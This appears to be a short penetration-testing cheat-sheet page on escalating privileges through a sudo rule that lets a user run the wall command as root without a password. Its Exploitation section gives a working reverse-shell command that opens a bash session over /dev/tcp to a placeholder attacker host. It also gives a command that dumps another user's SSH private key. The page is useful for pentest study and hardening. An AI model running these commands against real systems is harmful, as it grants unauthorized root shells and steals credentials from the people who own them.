Sudo Wall Privilege Escalation

The wall command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc).

Investigation

sudo -l

(ALL) NOPASSWD: wall

Exploitation

# Reverse shell
sudo wall "$(bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1')"

# Gets a SSH private key of another user
sudo wall "$(cat /home/user/.ssh/id_rsa)"

PreviousSudo Vim Privilege Escalation NextSudo Wget Privilege Escalation

Last updated 1 month ago

hashtagInvestigation

hashtagExploitation

Investigation

Exploitation